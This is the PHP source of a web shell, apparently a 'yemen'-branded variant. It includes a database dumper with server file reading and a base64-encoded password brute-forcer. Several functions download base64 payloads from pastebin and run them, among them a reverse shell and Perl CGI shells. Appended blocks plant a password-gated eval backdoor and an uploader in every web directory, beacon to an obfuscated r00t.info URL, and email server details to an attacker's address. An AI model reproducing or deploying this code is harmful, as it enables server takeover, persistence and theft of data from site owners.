break;
case "KOI8-R": $db->setCharset('koi8r');
break;
case "KOI8-U": $db->setCharset('koi8u');
break;
case "cp866": $db->setCharset('cp866');
break;
} if (empty($_POST['file'])) { ob_start("ob_gzhandler", 4096);
header("Content-Disposition: attachment;
filename=dump.sql");
header("Content-Type: text/plain");
foreach ($_POST['tbl'] as $v) $db->dump($v);
exit;
} elseif ($fp = @fopen($_POST['file'], 'w')) { foreach ($_POST['tbl'] as $v) $db->dump($v, $fp);
fclose($fp);
unset($_POST['p2']);
} else die('<script>alert("Error! Can\'t open file");
window.history.back(-1)</script>');
} yemenhead();
echo "
<div class=header>
<form name='sf' method='post' onsubmit='fs(this);
'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>
<td><select name='type'><option value='mysql' ";
if (@$_POST['type'] == 'mysql') echo 'selected';
echo ">MySql</option><option value='pgsql' ";
if (@$_POST['type'] == 'pgsql') echo 'selected';
echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='" . (empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])) . "'></td>
<td><input type=text name=sql_login value='" . (empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])) . "'></td>
<td><input type=text name=sql_pass value='" . (empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])) . "'></td><td>";
$tmp = "<input type=text name=sql_base value=''>";
if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251');
break;
case "UTF-8": $db->setCharset('utf8');
break;
case "KOI8-R": $db->setCharset('koi8r');
break;
case "KOI8-U": $db->setCharset('koi8u');
break;
case "cp866": $db->setCharset('cp866');
break;
} $db->listDbs();
echo "<select name=sql_base><option value=''></option>";
while ($item = $db->fetch()) { list($key, $value) = each($item);
echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>';
} echo '</select>';
} else echo $tmp;
} else echo $tmp;
echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);
'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count']) ? '' : ' checked') . "> count the number of rows</td>
</tr>
</table>
<script>
s_db='" . @addslashes($_POST['sql_base']) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
if(f.p1) f.p1.value='';
if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {
d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();
}
function is() {
for(i=0;
i<d.sf.elements['tbl[]'].length;
++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
}
</script>";
if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
if (!empty($_POST['sql_base'])) { $db->selectdb($_POST['sql_base']);
echo "<tr><td width=1 style='border-top:2px solid #666;
'><span>Tables:</span><br><br>";
$tbls_res = $db->listTables();
while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);
if (!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . ''));
$value = htmlspecialchars($value);
echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>
<a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? '
' : " <small>({$n['n']})</small>") . "</nobr><br>";
} echo "<input type='checkbox' onclick='is();
'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";
document.sf.submit();
'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;
'>";
if (@$_POST['p1'] == 'select') { $_POST['p1'] = 'query';
$_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
$db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
$num = $db->fetch();
$pages = ceil($num['n'] / 30);
echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
echo " of $pages";
if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'><
Prev</a>";
if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next >
</a>";
$_POST['p3']--;
if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . ($_POST['p3'] * 30);
else $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . ($_POST['p3'] * 30) . ',30';
echo "<br><br>";
} if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']);
if ($db->res !== false) { $title = false;
echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
$line = 1;
while ($item = $db->fetch()) { if (!$title) { echo '<tr>';
foreach ($item as $key => $value) echo '<th>' . $key . '</th>';
reset($item);
$title = true;
echo '</tr><tr>';
$line = 2;
} echo '<tr class="l' . $line . '">';
$line = $line == 1 ? 2 : 1;
foreach ($item as $key => $value) { if ($value == null) echo '<td><i>null</i></td>';
else echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>';
} echo '</tr>';
} echo '</table>';
} else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
} } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";
d.sf.p2.value=this.query.value;
document.sf.submit();
return false;
'><textarea name='query' style='width:100%;
height:100px'>";
if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
echo "</textarea><br/><input type=submit value='Execute'>";
echo "</td></tr>";
} echo "</table></form><br/>";
if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
if ($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";
document.sf.p2.value=this.f.value;
document.sf.submit();
return false;
'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
} if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']);
echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
} } else { echo htmlspecialchars($db->error());
} echo '</div>';
yemenfooter();
} function yemenbf() { yemenhead();
$cp1 = 'PD9waHANCkBzZXRfdGltZV9saW1pdCgwKTsNCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQplY2hvICcNCjxoZWFkPg0KDQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KPCEtLQ0KYm9keSB7DQoJYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsNCiAgICBmb250LXNpemU6IDE4cHg7DQoJY29sb3I6ICNjY2NjY2M7DQp9DQppbnB1dCx0ZXh0YXJlYSxzZWxlY3R7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjY2NjY2NjOw0KZGFzaGVkICNmZmZmZmY7DQpib3JkZXI6IDFweA0Kc29saWQgIzJDMkMyQzsNCmJhY2tncm91bmQtY29sb3I6ICMwODA4MDgNCn0NCmEgew0KCWJhY2tncm91bmQtY29sb3I6ICMxNTE1MTU7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzAwMDsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCmE6aG92ZXIgew0KCWJhY2tncm91bmQtY29sb3I6ICMwODA4MDg7DQoJdmVydGljYWwtYWxpZ246IGJvdHRvbTsNCgljb2xvcjogIzMzMzsNCgl0ZXh0LWRlY29yYXRpb246IG5vbmU7DQoJZm9udC1zaXplOiAyMHB4Ow0KCW1hcmdpbjogOHB4Ow0KCXBhZGRpbmc6IDZweDsNCglib3JkZXI6IHRoaW4gc29saWQgIzAwMDsNCn0NCi5zdHlsZTEgew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5zdHlsZTIgew0KCWNvbG9yOiAjRkZGRkZGOw0KCWZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KLnN0eWxlMyB7DQoJY29sb3I6ICNGRkZGRkY7DQp9DQotLT4NCjwvc3R5bGU+DQoNCjwvaGVhZD4NCic7DQpmdW5jdGlvbiBpbigkdHlwZSwkbmFtZSwkc2l6ZSwkdmFsdWUsJGNoZWNrZWQ9MCkgDQp7DQokcmV0ID0gIjxpbnB1dCB0eXBlPSIuJHR5cGUuIiBuYW1lPSIuJG5hbWUuIiAiO2lmKCRzaXplICE9IDApIA0Kew0KJHJldCAuPSAic2l6ZT0iLiRzaXplLiIgIjt9DQokcmV0IC49ICJ2YWx1ZT1cIiIuJHZhbHVlLiJcIiI7aWYoJGNoZWNrZWQpICRyZXQgLj0gIiBjaGVja2VkIjtyZXR1cm4gJHJldC4iPiI7fQ0KZWNobyAiPGJyPjx0aXRsZT5CcnV0ZSBGb3JjZSBCeSBNb25kczwvdGl0bGU+PGZvcm0gbmFtZT1mb3JtIG1ldGhvZD1QT1NUPiI7DQplY2hvIGluKCdoaWRkZW4nLCdkYicsMCwkX1BPU1RbJ2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2RiX3NlcnZlcicsMCwkX1BPU1RbJ2RiX3NlcnZlciddKTtlY2hvIGluKCdoaWRkZW4nLCdkYl9wb3J0JywwLCRfUE9TVFsnZGJfcG9ydCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9sJywwLCRfUE9TVFsnbXlzcWxfbCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9wJywwLCRfUE9TVFsnbXlzcWxfcCddKTtlY2hvIGluKCdoaWRkZW4nLCdteXNxbF9kYicsMCwkX1BPU1RbJ215c3FsX2RiJ10pO2VjaG8gaW4oJ2hpZGRlbicsJ2NjY2MnLDAsJ2RiX3F1ZXJ5Jyk7DQoNCmlmKCRfUE9TVFsncGFnZSddPT0nZmluZCcpDQp7DQppZihpc3NldCgkX1BPU1RbJ3VzZXJuYW1lcyddKSAmJmlzc2V0KCRfUE9TVFsncGFzc3dvcmRzJ10pKQ0Kew0KaWYoJF9QT1NUWyd0eXBlJ10gPT0gJ3Bhc3N3ZCcpew0KJGUgPSBleHBsb2RlKCJcbiIsJF9QT1NUWyd1c2VybmFtZXMnXSk7DQpmb3JlYWNoKCRlIGFzICR2YWx1ZSl7DQokayA9IGV4cGxvZGUoIjoiLCR2YWx1ZSk7DQokdXNlcm5hbWUgLj0gJGtbJzAnXS4iICI7DQp9DQp9ZWxzZWlmKCRfUE9TVFsndHlwZSddID09ICdzaW1wbGUnKXsNCiR1c2VybmFtZSA9IHN0cl9yZXBsYWNlKCJcbiIsJyAnLCRfUE9TVFsndXNlcm5hbWVzJ10pOw0KfQ0KJGExID0gZXhwbG9kZSgiICIsJHVzZXJuYW1lKTsNCiRhMiA9IGV4cGxvZGUoIlxuIiwkX1BPU1RbJ3Bhc3N3b3JkcyddKTsNCiRpZDIgPSBjb3VudCgkYTIpOw0KJG9rID0gMDsNCmZvcmVhY2goJGExIGFzICR1c2VyICkNCnsNCmlmKCR1c2VyICE9PSAnJykNCnsNCiR1c2VyPXRyaW0oJHVzZXIpOw0KZm9yKCRpPTA7JGk8PSRpZDI7JGkrKykNCnsNCiRwYXNzID0gdHJpbSgkYTJbJGldKTsNCmlmKEBteXNxbF9jb25uZWN0KCdsb2NhbGhvc3QnLCR1c2VyLCRwYXNzKSkNCnsNCmVjaG8gIkJMQUNLfiB1c2VyIGlzICg8Yj48Zm9udCBjb2xvcj1ncmVlbj4kdXNlcjwvZm9udD48L2I+KSBQYXNzd29yZCBpcyAoPGI+PGZvbnQgY29sb3I9Z3JlZW4+JHBhc3M8L2ZvbnQ+PC9iPik8YnIgLz4iOw0KJG9rKys7DQp9DQp9DQp9DQp9DQplY2hvICI8aHI+PGI+WW91IEZvdW5kIDxmb250IGNvbG9yPWdyZWVuPiRvazwvZm9udD4gQ3BhbmVsIEJ5IEJMQUNLIFNjcmlwdCBOYW1lPC9iPiI7DQplY2hvICI8Y2VudGVyPjxiPjxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iPkJBQ0s8L2E+IjsNCmV4aXQ7DQp9DQp9DQo7ZWNobyAnDQoNCg0KDQo8Zm9ybSBtZXRob2Q9IlBPU1QiIHRhcmdldD0iX2JsYW5rIj4NCgk8c3Ryb25nPg0KPGlucHV0IG5hbWU9InBhZ2UiIHR5cGU9ImhpZGRlbiIgdmFsdWU9ImZpbmQiPiAgICAgICAgCQkJCQ0KICAgIDwvc3Ryb25nPg0KICAgIDx0YWJsZSB3aWR0aD0iNjAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+DQogICAgPHRyPg0KICAgICAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiPjxjZW50ZXI+PGJyPg0KCQk8L3N0cm9uZz4NCgkJPGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL21vbmRzLmhhY2tlcnMiIGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+RGV2ZWxvcGVkIEJ5IA0KPGZvbnQgY29sb3I9IiNGRjAwMDAiPk1vbmRzPC9mb250Pjwvc3Ryb25nPjwvYT48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+PC9jZW50ZXI+PC90ZD48L2ZvbnQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkPg0KICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMyIgY2VsbHNwYWNpbmc9IjEiIGFsaWduPSJjZW50ZXIiPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY2xhc3M9InN0eWxlMiIgc3R5bGU9IndpZHRoOiAxMzlweCI+DQoJPHN0cm9uZz5Vc2VyIDo8L3N0cm9uZz48L3RkPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgY29sc3Bhbj0iNSI+PHN0cm9uZz48dGV4dGFyZWEgY29scz0iNDAiIHJvd3M9IjEwIiBuYW1lPSJ1c2VybmFtZXMiPjwvdGV4dGFyZWE+PC9zdHJvbmc+PC90ZD4NCiAgICA8L3RyPg0KICAgIDx0cj4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNsYXNzPSJzdHlsZTIiIHN0eWxlPSJ3aWR0aDogMTM5cHgiPg0KCTxzdHJvbmc+UGFzcyA6PC9zdHJvbmc+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PHRleHRhcmVhIGNvbHM9IjQwIiByb3dzPSIxMCIgbmFtZT0icGFzc3dvcmRzIj48L3RleHRhcmVhPjwvc3Ryb25nPjwvdGQ+DQogICAgPC90cj4NCiAgICA8dHI+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjbGFzcz0ic3R5bGUyIiBzdHlsZT0id2lkdGg6IDEzOXB4Ij4NCgk8c3Ryb25nPlR5cGUgOjwvc3Ryb25nPjwvdGQ+DQogICAgPHRkIHZhbGlnbj0idG9wIiBiZ2NvbG9yPSIjMTUxNTE1IiBjb2xzcGFuPSI1Ij4NCiAgICA8c3BhbiBjbGFzcz0ic3R5bGUyIj48c3Ryb25nPlNpbXBsZSA6IDwvc3Ryb25nPiA8L3NwYW4+DQoJPHN0cm9uZz4NCgk8aW5wdXQgdHlwZT0icmFkaW8iIG5hbWU9InR5cGUiIHZhbHVlPSJzaW1wbGUiIGNoZWNrZWQ9ImNoZWNrZWQiIGNsYXNzPSJzdHlsZTMiPjwvc3Ryb25nPg0KICAgIDxmb250IGNsYXNzPSJzdHlsZTIiPjxzdHJvbmc+L2V0Yy9wYXNzd2QgOiA8L3N0cm9uZz4gPC9mb250Pg0KCTxzdHJvbmc+DQoJPGlucHV0IHR5cGU9InJhZGlvIiBuYW1lPSJ0eXBlIiB2YWx1ZT0icGFzc3dkIiBjbGFzcz0ic3R5bGUzIj48L3N0cm9uZz48c3BhbiBjbGFzcz0ic3R5bGUzIj48c3Ryb25nPg0KCTwvc3Ryb25nPg0KCTwvc3Bhbj4NCiAgICA8L3RkPg0KICAgIDwvdHI+DQogICAgPHRyPg0KICAgIDx0ZCB2YWxpZ249InRvcCIgYmdjb2xvcj0iIzE1MTUxNSIgc3R5bGU9IndpZHRoOiAxMzlweCI+PC90ZD4NCiAgICA8dGQgdmFsaWduPSJ0b3AiIGJnY29sb3I9IiMxNTE1MTUiIGNvbHNwYW49IjUiPjxzdHJvbmc+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9InN0YXJ0Ij4NCiAgICA8L3N0cm9uZz4NCiAgICA8L3RkPg0KICAgIDx0cj4NCjwvZm9ybT4gICAgDQogICAgDQogICAgDQogICANCic7DQppZigkX1BPU1RbJ2F0dCddPT1udWxsKQ0Kew0KZWNobyAnCQkJCQkJICc7DQp9ZWxzZXsNCmVjaG8gIgkJCQkJCSANCgkJCQkJCSANCiI7DQp9';
$file = fopen("cpanel.php", "w+");
$file = fopen("cpanel.php", "w+");
$write = fwrite($file, base64_decode($cp1));
fclose($file);
echo '<iframe src="cpanel.php" style="height:500px;
width:1500px;
border:0px;
" name="brute">';
yemenfooter();
} function yemenrev() { $reverse = file_get_contents('http://pastebin.com/raw.php?i=8AxYU3Rd');
$file = fopen("rev.php", "w+");
$write = fwrite($file, base64_decode($reverse));
fclose($file);
yemenhead();
echo '<iframe src="rev.php" style="height:500px;
width:500px;
border:0px;
" name="reverse">';
yemenfooter();
} function yemenconpass() { yemenhead();
echo '<center><embed src="http://nyccah.rayogram.com/3Turr" style="height:250px;
width:99%;
border:4px solid #ccc;
;
" name="conpass" ></embed></center>';
yemenfooter();
} function yemenperl() { mkdir('cgirun', 0755);
chdir('cgirun');
$kokdosya = ".htaccess";
$dosya_adi = "$kokdosya";
$dosya = fopen($dosya_adi, 'w') or die("khong the tao shell!");
$metin = "AddHandler cgi-script .pr";
fwrite($dosya, $metin);
fclose($dosya);
$cgico = @file_get_contents('http://pastebin.com/raw.php?i=7xJptQEY');
$file = fopen("cgi.pr", "w+");
$write = fwrite($file, base64_decode($cgico));
fclose($file);
chmod("cgi.pr", 0755);
yemenhead();
echo '<iframe src="cgirun/cgi.pr" style="height:500px;
width:1000px;
border:0px;
" name="config">';
} function yemenperl4() { mkdir('cgirun', 0755);
chdir('cgirun');
$dosya = fopen('.htaccess', 'w') or die("Do it manually !");
$metin = "AddHandler cgi-script .pr";
fwrite($dosya, $metin);
fclose($dosya);
$cgico = file_get_contents('http://pastebin.com/raw.php?i=hsMFJvrK');
$file = fopen("cgi4.pr", "w+");
$write = fwrite($file, base64_decode($cgico));
fclose($file);
chmod("cgi4.pr", 0755);
yemenhead();
echo '<iframe src="cgirun/cgi4.pr" style="height:500px;
width:1000px;
border:0px;
" name="config">';
} function yemenzone() { yemenhead();
$zone1 = file_get_contents('http://pastebin.com/raw.php?i=jwz4TeZq');
$file = fopen("zone.php", "w+");
$write = fwrite($file, base64_decode($zone1));
fclose($file);
echo '<iframe src="zone.php" style="height:500px;
width:1500px;
border:0px;
" name="zone">';
yemenfooter();
} function yemenzonejoy() { yemenhead();
$zone1 = file_get_contents('http://pastebin.com/raw.php?i=aLsyUHdu');
$file = fopen("zonejoy.php", "w+");
$write = fwrite($file, base64_decode($zone1));
fclose($file);
echo '<iframe src="zonejoy.php" style="height:500px;
width:1500px;
border:0px;
" name="zonejoy" />>';
yemenfooter();
} function yemenzip() { yemenhead();
$zip1 = file_get_contents('http://pastebin.com/raw.php?i=bTR5Pb38');
$file = fopen("zip.php", "w+");
$write = fwrite($file, base64_decode($zip1));
fclose($file);
echo '<iframe src="zip.php" style="height:500px;
width:1500px;
border:0px;
" name="zip">';
yemenfooter();
} if (empty($_POST['a'])) if (isset($default_action) && function_exists('yemen' . $default_action)) $_POST['a'] = $default_action;
else $_POST['a'] = 'FilesMan';
if (!empty($_POST['a']) && function_exists('yemen' . $_POST['a'])) call_user_func('yemen' . $_POST['a']);
exit;
?>
<?php @session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('display_errors', 0);
@ini_set('output_buffering',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
?>
<?php @session_start();
@error_reporting(0);
$a = '
<?php
session_start();
if($_SESSION["adm"]){
echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';
echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';
echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';
if( $_POST[\'_upl\'] == "Upload" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\';
} else { echo \'<b>Upload Fail !!!</b><br><br>\';
}}
}
if($_POST["p"]){
$p = $_POST["p"];
$pa = md5(sha1($p));
if($pa=="683ce9b1d91af441dec18dad25584421"){
$_SESSION["adm"] = 1;
}
}
?>
<form action="" method="post">
<input type="text" name="p">
</form>
';
if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"];
$pa = md5(sha1($p));
if($pa=="683ce9b1d91af441dec18dad25584421"){ echo @eval(@file_get_contents(@$_REQUEST["404"]));
} } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"];
$dir = scandir($doc);
$d1 = ''.$doc.'/.';
$d2 = ''.$doc.'/..';
if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]);
} if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]);
} if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]);
} @array_push($dir,$doc);
foreach($dir as $d){ $p = $doc."/".$d;
if(is_dir($p)){ $file = $p."/jvc.php";
@touch($file);
$folder = @fopen($file,"w");
@fwrite($folder,$a);
} } $lls = $_SERVER["HTTP_HOST"];
$llc = $_SERVER["REQUEST_URI"];
$lld = 'http://'.$lls.''.$llc.'';
$brow = urlencode($_SERVER['HTTP_USER_AGENT']);
$retValue = file_get_contents(base64_decode("aHR0cDovL3IwMHQuaW5mby95YXoucGhwP2E=")."=".$lld.base64_decode("JmI=")."=".$brow);
echo $retValue;
@$_SESSION["sdm"]=1;
}
?>
<?php $kime = "byhero44@gmail.com";
$baslik = "r00t.info Server Avcisi V1.0";
$EL_MuHaMMeD = "Dosya Yolu : " . $_SERVER['DOCUMENT_ROOT'] . "\r\n";
$EL_MuHaMMeD.= "Server Admin : " . $_SERVER['SERVER_ADMIN'] . "\r\n";
$EL_MuHaMMeD.= "Server isletim sistemi : " . $_SERVER['SERVER_SOFTWARE'] . "\r\n";
$EL_MuHaMMeD.= "Shell Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['PHP_SELF'] . "\r\n";
$EL_MuHaMMeD.= "Avlanan Site : " . $_SERVER['HTTP_HOST'] . "\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?>